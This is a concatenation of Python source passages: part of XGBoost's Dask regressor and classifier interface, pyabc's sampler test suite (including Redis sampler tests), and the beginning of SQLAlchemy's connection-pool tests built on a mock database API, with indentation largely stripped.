model: Union[TrainReturnT, Booster],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = 'value',
missing: float = numpy.nan
) -> Any:
'''Inplace prediction.
.. versionadded:: 1.1.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model.
iteration_range:
Specify the range of trees used for prediction.
predict_type:
* 'value': Normal prediction result.
* 'margin': Output the raw untransformed margin value.
missing:
        Value in the input data which should be treated as missing. If None,
        defaults to np.nan.
Returns
-------
prediction
'''
_assert_dask_support()
client = _xgb_get_client(client)
global_config = config.get_config()
return client.sync(_inplace_predict_async, client, global_config, model=model,
data=data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing)
async def _evaluation_matrices(
client: "distributed.Client",
validation_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
sample_weight: Optional[List[_DaskCollection]],
missing: float
) -> Optional[List[Tuple[DaskDMatrix, str]]]:
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
    sample_weight: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals: Optional[List[Tuple[DaskDMatrix, str]]] = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weight[i] if sample_weight is not None else None)
dmat = await DaskDMatrix(client=client, data=e[0], label=e[1],
weight=w, missing=missing)
assert isinstance(evals, list)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: List[Tuple[_DaskCollection, _DaskCollection]] = None,
eval_metric: Optional[Callable] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
feature_weights: Optional[_DaskCollection] = None,
callbacks: List[TrainingCallback] = None
) -> "DaskScikitLearnBase":
'''Fit gradient boosting model
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
eval_metric : str, list of str, or callable, optional
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.
early_stopping_rounds : int
Activates early stopping.
verbose : bool
If `verbose` and an evaluation set is used, writes the evaluation
metric measured on the validation set to stderr.
feature_weights: array_like
Weight for each feature, defines the probability of each feature being
selected when colsample is being used. All values must be greater than 0,
otherwise a `ValueError` is thrown. Only available for `hist`, `gpu_hist` and
`exact` tree methods.
callbacks : list of callback functions
List of callback functions that are applied at end of each iteration.
It is possible to use predefined callbacks by using :ref:`callback_api`.
Example:
.. code-block:: python
callbacks = [xgb.callback.EarlyStopping(rounds=early_stopping_rounds,
save_best=True)]
'''
raise NotImplementedError
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
output_margin : Whether to output the raw untransformed margin value.
ntree_limit : NOT supported on dask interface.
validate_features :
When this is True, validate that the Booster's and data's feature_names are
identical. Otherwise, it is assumed that the feature_names are the same.
Returns
-------
prediction:
'''
raise NotImplementedError
def __await__(self) -> Awaitable[Any]:
# Generate a coroutine wrapper to make this class awaitable.
async def _() -> Awaitable[Any]:
return self
return self.client.sync(_).__await__()
@property
def client(self) -> "distributed.Client":
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt: "distributed.Client") -> None:
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection,
y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Callable]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> _DaskCollection:
dtrain = await DaskDMatrix(client=self.client,
data=X,
label=y,
weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
missing=self.missing)
params = self.get_xgb_params()
evals = await _evaluation_matrices(self.client, eval_set,
sample_weight_eval_set,
self.missing)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
metric = eval_metric if callable(eval_metric) else None
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
params.update({"eval_metric": eval_metric})
results = await train(client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
obj=obj,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=missing-docstring
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: List[Tuple[_DaskCollection, _DaskCollection]] = None,
eval_metric: Optional[Callable] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
feature_weights: Optional[_DaskCollection] = None,
callbacks: List[TrainingCallback] = None
) -> "DaskXGBRegressor":
_assert_dask_support()
return self.client.sync(self._fit_async,
X=X,
y=y,
sample_weight=sample_weight,
base_margin=base_margin,
eval_set=eval_set,
eval_metric=eval_metric,
sample_weight_eval_set=sample_weight_eval_set,
early_stopping_rounds=early_stopping_rounds,
verbose=verbose,
feature_weights=feature_weights,
callbacks=callbacks)
async def _predict_async(
self, data: _DaskCollection,
output_margin: bool = False,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=data, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(client=self.client,
model=self.get_booster(), data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features)
return pred_probs
# pylint: disable=arguments-differ
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(self._predict_async, data,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin)
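# A minimal usage sketch (never called) for the scikit-learn style wrapper, the
# second of the two APIs described in the module docstring.
def _regressor_usage_sketch(client: "distributed.Client") -> Any:
    X = da.random.random((1000, 10), chunks=(100, 10))
    y = da.random.random(1000, chunks=100)
    regressor = DaskXGBRegressor(n_estimators=10, tree_method='hist')
    regressor.client = client       # attach the dask client to the estimator
    regressor.fit(X, y)
    return regressor.predict(X)     # lazy dask array of predictions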
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model'])
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection, y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Callable]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> "DaskXGBClassifier":
dtrain = await DaskDMatrix(client=self.client,
data=X,
label=y,
weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
missing=self.missing)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = await _evaluation_matrices(self.client, eval_set,
sample_weight_eval_set,
self.missing)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
metric = eval_metric if callable(eval_metric) else None
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
params.update({"eval_metric": eval_metric})
results = await train(client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
obj=obj,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks)
self._Booster = results['booster']
if not callable(self.objective):
self.objective = params["objective"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_metric: Optional[Union[str, List[str], Callable]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
early_stopping_rounds: int = None,
verbose: bool = True,
feature_weights: _DaskCollection = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBClassifier":
_assert_dask_support()
return self.client.sync(self._fit_async,
X=X,
y=y,
sample_weight=sample_weight,
base_margin=base_margin,
eval_set=eval_set,
eval_metric=eval_metric,
sample_weight_eval_set=sample_weight_eval_set,
early_stopping_rounds=early_stopping_rounds,
verbose=verbose,
feature_weights=feature_weights,
callbacks=callbacks)
async def _predict_proba_async(
self,
X: _DaskCollection,
validate_features: bool,
output_margin: bool,
base_margin: Optional[_DaskCollection]
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=X, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(client=self.client,
model=self.get_booster(),
data=test_dmatrix,
validate_features=validate_features,
output_margin=output_margin)
return _cls_predict_proba(self.objective, pred_probs, da.vstack)
# pylint: disable=arguments-differ,missing-docstring
def predict_proba(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
output_margin: bool = False,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(
self._predict_proba_async,
X=X,
validate_features=validate_features,
output_margin=output_margin,
base_margin=base_margin
)
async def _predict_async(
self, data: _DaskCollection,
output_margin: bool = False,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> _DaskCollection:
test_dmatrix = await DaskDMatrix(
client=self.client, data=data, base_margin=base_margin,
missing=self.missing
)
pred_probs = await predict(
client=self.client,
model=self.get_booster(),
data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features
)
if output_margin:
return pred_probs
if self.n_classes_ == 2:
preds = (pred_probs > 0.5).astype(int)
else:
preds = da.argmax(pred_probs, axis=1)
return preds
# pylint: disable=arguments-differ
def predict(
self,
data: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None
) -> Any:
_assert_dask_support()
msg = '`ntree_limit` is not supported on dask, use model slicing instead.'
assert ntree_limit is None, msg
return self.client.sync(
self._predict_async,
data,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin
)
|
test_samplers.py
|
import multiprocessing
import pytest
import numpy as np
import scipy.stats as st
import pandas as pd
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from pyabc.sampler import (SingleCoreSampler,
MappingSampler,
MulticoreParticleParallelSampler,
DaskDistributedSampler,
ConcurrentFutureSampler,
MulticoreEvalParallelSampler,
RedisEvalParallelSamplerServerStarter,
RedisStaticSamplerServerStarter)
import pyabc
import logging
import os
import tempfile
logger = logging.getLogger(__name__)
def multi_proc_map(f, x):
with multiprocessing.Pool() as pool:
res = pool.map(f, x)
return res
class GenericFutureWithProcessPool(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ProcessPoolExecutor(max_workers=8)
client_max_jobs = 8
super().__init__(cfuture_executor, client_max_jobs)
class GenericFutureWithProcessPoolBatch(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ProcessPoolExecutor(max_workers=8)
client_max_jobs = 8
batch_size = 15
super().__init__(cfuture_executor, client_max_jobs,
batch_size=batch_size)
class GenericFutureWithThreadPool(ConcurrentFutureSampler):
def __init__(self, map_=None):
cfuture_executor = ThreadPoolExecutor(max_workers=8)
client_max_jobs = 8
super().__init__(cfuture_executor, client_max_jobs)
class MultiProcessingMappingSampler(MappingSampler):
def __init__(self, map_=None):
super().__init__(multi_proc_map)
class DaskDistributedSamplerBatch(DaskDistributedSampler):
def __init__(self, map_=None):
batch_size = 20
super().__init__(batch_size=batch_size)
class WrongOutputSampler(SingleCoreSampler):
def sample_until_n_accepted(
self, n, simulate_one, t, *,
max_eval=np.inf, all_accepted=False, ana_vars=None):
return super().sample_until_n_accepted(
n+1, simulate_one, t, max_eval=max_eval,
all_accepted=all_accepted, ana_vars=ana_vars)
def RedisEvalParallelSamplerWrapper(**kwargs):
return RedisEvalParallelSamplerServerStarter(batch_size=5, **kwargs)
def RedisEvalParallelSamplerLookAheadDelayWrapper(**kwargs):
return RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=True, **kwargs)
def RedisStaticSamplerWrapper(**kwargs):
return RedisStaticSamplerServerStarter(**kwargs)
def PicklingMulticoreParticleParallelSampler():
return MulticoreParticleParallelSampler(pickle=True)
def PicklingMulticoreEvalParallelSampler():
return MulticoreEvalParallelSampler(pickle=True)
@pytest.fixture(params=[SingleCoreSampler,
RedisEvalParallelSamplerWrapper,
RedisEvalParallelSamplerLookAheadDelayWrapper,
RedisStaticSamplerWrapper,
MulticoreEvalParallelSampler,
MultiProcessingMappingSampler,
MulticoreParticleParallelSampler,
PicklingMulticoreParticleParallelSampler,
PicklingMulticoreEvalParallelSampler,
MappingSampler,
DaskDistributedSampler,
DaskDistributedSamplerBatch,
GenericFutureWithThreadPool,
GenericFutureWithProcessPool,
GenericFutureWithProcessPoolBatch,
])
def sampler(request):
s = request.param()
try:
yield s
finally:
# release all resources
try:
s.shutdown()
except AttributeError:
pass
@pytest.fixture
def redis_starter_sampler(request):
s = RedisEvalParallelSamplerServerStarter(batch_size=5)
try:
yield s
finally:
# release all resources
s.shutdown()
def basic_testcase():
"""A simple test model."""
def model(p):
return {"y": p['p0'] + 0.1 * np.random.randn(10)}
prior = pyabc.Distribution(
p0=pyabc.RV('uniform', -5, 10), p1=pyabc.RV('uniform', -2, 2))
def distance(y1, y2):
return np.abs(y1['y'] - y2['y']).sum()
obs = {'y': 1}
return model, prior, distance, obs
def test_two_competing_gaussians_multiple_population(db_path, sampler):
two_competing_gaussians_multiple_population(
db_path, sampler, 1)
def test_two_competing_gaussians_multiple_population_2_evaluations(
db_path, sampler):
two_competing_gaussians_multiple_population(db_path, sampler, 2)
def two_competing_gaussians_multiple_population(db_path, sampler, n_sim):
# Define a gaussian model
sigma = .5
def model(args):
return {"y": st.norm(args['x'], sigma).rvs()}
# We define two models, but they are identical so far
models = [model, model]
models = list(map(pyabc.SimpleModel, models))
# However, our models' priors are not the same. Their mean differs.
mu_x_1, mu_x_2 = 0, 1
parameter_given_model_prior_distribution = [
pyabc.Distribution(x=pyabc.RV("norm", mu_x_1, sigma)),
pyabc.Distribution(x=pyabc.RV("norm", mu_x_2, sigma)),
]
# We plug all the ABC setups together
nr_populations = 2
pop_size = pyabc.ConstantPopulationSize(23, nr_samples_per_parameter=n_sim)
abc = pyabc.ABCSMC(models, parameter_given_model_prior_distribution,
pyabc.PercentileDistance(measures_to_use=["y"]),
pop_size,
eps=pyabc.MedianEpsilon(),
sampler=sampler)
# Finally we add meta data such as model names and
# define where to store the results
# y_observed is the important piece here: our actual observation.
y_observed = 1
abc.new(db_path, {"y": y_observed})
# We run the ABC with 3 populations max
minimum_epsilon = .05
history = abc.run(minimum_epsilon, max_nr_populations=nr_populations)
# Evaluate the model probabilities
mp = history.get_model_probabilities(history.max_t)
def p_y_given_model(mu_x_model):
res = st.norm(mu_x_model, np.sqrt(sigma**2 + sigma**2)).pdf(y_observed)
return res
p1_expected_unnormalized = p_y_given_model(mu_x_1)
p2_expected_unnormalized = p_y_given_model(mu_x_2)
p1_expected = p1_expected_unnormalized / (p1_expected_unnormalized
+ p2_expected_unnormalized)
p2_expected = p2_expected_unnormalized / (p1_expected_unnormalized
+ p2_expected_unnormalized)
assert history.max_t == nr_populations-1
# the next line only tests if we obtain correct numerical types
try:
mp0 = mp.p[0]
except KeyError:
mp0 = 0
try:
mp1 = mp.p[1]
except KeyError:
mp1 = 0
assert abs(mp0 - p1_expected) + abs(mp1 - p2_expected) < np.inf
# check that sampler only did nr_particles samples in first round
pops = history.get_all_populations()
# since we had calibration (of epsilon), check that was saved
pre_evals = pops[pops['t'] == pyabc.History.PRE_TIME]['samples'].values
assert pre_evals >= pop_size.nr_particles
# our samplers should not have overhead in calibration, except batching
batch_size = sampler.batch_size if hasattr(sampler, 'batch_size') else 1
max_expected = pop_size.nr_particles + batch_size - 1
if pre_evals > max_expected:
# Violations have been observed occasionally for the redis server
# due to runtime conditions with the increase of the evaluations
# counter. This could be overcome, but as it usually only happens
# for low-runtime models, this should not be a problem. Thus, only
# print a warning here.
logger.warning(
f"Had {pre_evals} simulations in the calibration iteration, "
f"but a maximum of {max_expected} would have been sufficient for "
f"the population size of {pop_size.nr_particles}.")
def test_progressbar(sampler):
"""Test whether using a progress bar gives any errors."""
model, prior, distance, obs = basic_testcase()
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler, population_size=20)
abc.new(db=pyabc.create_sqlite_db_id(), observed_sum_stat=obs)
abc.run(max_nr_populations=3)
def test_in_memory(redis_starter_sampler):
db_path = "sqlite://"
two_competing_gaussians_multiple_population(db_path,
redis_starter_sampler, 1)
def test_wrong_output_sampler():
sampler = WrongOutputSampler()
def simulate_one():
return pyabc.Particle(m=0, parameter={}, weight=0,
accepted_sum_stats=[], accepted_distances=[],
accepted=True)
with pytest.raises(AssertionError):
sampler.sample_until_n_accepted(5, simulate_one, 0)
def test_redis_multiprocess():
def simulate_one():
accepted = np.random.randint(2)
return pyabc.Particle(0, {}, 0.1, [], [], accepted)
sampler = RedisEvalParallelSamplerServerStarter(
batch_size=3, workers=1, processes_per_worker=2)
try:
# id needs to be set
sampler.set_analysis_id("ana_id")
sample = sampler.sample_until_n_accepted(10, simulate_one, 0)
assert 10 == len(sample.get_accepted_population())
finally:
sampler.shutdown()
def test_redis_catch_error():
def model(pars):
if np.random.uniform() < 0.1:
raise ValueError("error")
return {'s0': pars['p0'] + 0.2 * np.random.uniform()}
def distance(s0, s1):
return abs(s0['s0'] - s1['s0'])
prior = pyabc.Distribution(p0=pyabc.RV("uniform", 0, 10))
sampler = RedisEvalParallelSamplerServerStarter(
batch_size=3, workers=1, processes_per_worker=1)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler, population_size=10)
db_file = "sqlite:///" + os.path.join(tempfile.gettempdir(), "test.db")
data = {'s0': 2.8}
abc.new(db_file, data)
abc.run(minimum_epsilon=.1, max_nr_populations=3)
finally:
sampler.shutdown()
def test_redis_pw_protection():
def simulate_one():
accepted = np.random.randint(2)
return pyabc.Particle(0, {}, 0.1, [], [], accepted)
sampler = RedisEvalParallelSamplerServerStarter( # noqa: S106
password="daenerys")
try:
# needs to be always set
sampler.set_analysis_id("ana_id")
sample = sampler.sample_until_n_accepted(10, simulate_one, 0)
assert 10 == len(sample.get_accepted_population())
finally:
sampler.shutdown()
def test_redis_continuous_analyses():
"""Test correct behavior of the redis server with multiple analyses."""
sampler = RedisEvalParallelSamplerServerStarter()
try:
sampler.set_analysis_id("id1")
# try "starting a new run while the old one has not finished yet"
with pytest.raises(AssertionError) as e:
sampler.set_analysis_id("id2")
assert "busy with an analysis " in str(e.value)
# after stopping it should work
sampler.stop()
sampler.set_analysis_id("id2")
finally:
sampler.shutdown()
def test_redis_subprocess():
"""Test whether the instructed redis sampler allows worker subprocesses."""
# print worker output
logging.getLogger("Redis-Worker").addHandler(logging.StreamHandler())
def model_process(p, pipe):
"""The actual model."""
pipe.send({"y": p['p0'] + 0.1 * np.random.randn(10)})
def model(p):
"""Model calling a subprocess."""
parent, child = multiprocessing.Pipe()
proc = multiprocessing.Process(target=model_process, args=(p, child))
proc.start()
res = parent.recv()
proc.join()
return res
prior = pyabc.Distribution(
p0=pyabc.RV('uniform', -5, 10), p1=pyabc.RV('uniform', -2, 2))
def distance(y1, y2):
return np.abs(y1['y'] - y2['y']).sum()
obs = {'y': 1}
# False as daemon argument is ok, True and None are not allowed
sampler = RedisEvalParallelSamplerServerStarter(
workers=1, processes_per_worker=2, daemon=False)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=10)
abc.new(pyabc.create_sqlite_db_id(), obs)
# would just never return if model evaluation fails
abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
def test_redis_look_ahead():
"""Test the redis sampler in look-ahead mode."""
model, prior, distance, obs = basic_testcase()
eps = pyabc.ListEpsilon([20, 10, 5])
# spice things up with an adaptive population size
pop_size = pyabc.AdaptivePopulationSize(
start_nr_particles=50, mean_cv=0.5, max_population_size=50)
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=False,
log_file=fh.name)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=pop_size, eps=eps)
abc.new(pyabc.create_sqlite_db_id(), obs)
h = abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
assert h.n_populations == 3
# read log file
df = pd.read_csv(fh.name, sep=',')
assert (df.n_lookahead > 0).any()
assert (df.n_lookahead_accepted > 0).any()
assert (df.n_preliminary == 0).all()
def test_redis_look_ahead_error():
"""Test whether the look-ahead mode fails as expected."""
model, prior, distance, obs = basic_testcase()
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=False,
log_file=fh.name)
args_list = [
{'eps': pyabc.MedianEpsilon()},
{'distance_function': pyabc.AdaptivePNormDistance()}]
for args in args_list:
if 'distance_function' not in args:
args['distance_function'] = distance
try:
with pytest.raises(AssertionError) as e:
abc = pyabc.ABCSMC(
model, prior, sampler=sampler,
population_size=10, **args)
abc.new(pyabc.create_sqlite_db_id(), obs)
abc.run(max_nr_populations=3)
assert "cannot be used in look-ahead mode" in str(e.value)
finally:
sampler.shutdown()
def test_redis_look_ahead_delayed():
"""Test the look-ahead sampler with delayed evaluation in an adaptive
setup."""
model, prior, distance, obs = basic_testcase()
# spice things up with an adaptive population size
pop_size = pyabc.AdaptivePopulationSize(
start_nr_particles=50, mean_cv=0.5, max_population_size=50)
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerLookAheadDelayWrapper(
log_file=fh.name)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=pop_size)
abc.new(pyabc.create_sqlite_db_id(), obs)
abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
# read log file
df = pd.read_csv(fh.name, sep=',')
assert (df.n_lookahead > 0).any()
assert (df.n_lookahead_accepted > 0).any()
# in delayed mode, all look-aheads must have been preliminary
assert (df.n_lookahead == df.n_preliminary).all()
|
test_pool.py
|
import threading, time
from sqlalchemy import pool, interfaces, create_engine, select
import sqlalchemy as tsa
from sqlalchemy.test import TestBase, testing
from sqlalchemy.test.util import gc_collect, lazy_gc
from sqlalchemy.test.testing import eq_
mcid = 1
class MockDBAPI(object):
def __init__(self):
self.throw_error = False
def connect(self, *args, **kwargs):
if self.throw_error:
raise Exception("couldnt connect !")
delay = kwargs.pop('delay', 0)
if delay:
time.sleep(delay)
return MockConnection()
class MockConnection(object):
def __init__(self):
global mcid
self.id = mcid
self.closed = False
mcid += 1
def close(self):
self.closed = True
def rollback(self):
pass
def cursor(self):
return MockCursor()
class MockCursor(object):
def execute(self, *args, **kw):
pass
def close(self):
pass
mock_dbapi = MockDBAPI()
class PoolTestBase(TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
class PoolTest(PoolTestBase):
def testmanager(self):
manager = pool.manage(mock_dbapi, use_threadlocal=True)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
connection3 = manager.connect('bar.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is connection2)
self.assert_(connection2 is not connection3)
def testbadargs(self):
manager = pool.manage(mock_dbapi)
try:
connection = manager.connect(None)
except:
pass
def testnonthreadlocalmanager(self):
manager = pool.manage(mock_dbapi, use_threadlocal = False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p.recreate()
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.throw_error = True
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
for p in pool.QueuePool(creator=mock_dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=mock_dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_properties(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
pool_size=1, max_overflow=0, use_threadlocal=False)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
self.assert_(c.connection is not c2.connection)
self.assert_(not c2.info)
self.assert_('foo2' in c.info)
def test_listeners(self):
dbapi = MockDBAPI()
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print "connect(%s, %s)" % (con, record)
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print "first_connect(%s, %s)" % (con, record)
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print "checkout(%s, %s, %s)" % (con, record, proxy)
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print "checkin(%s, %s)" % (con, record)
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
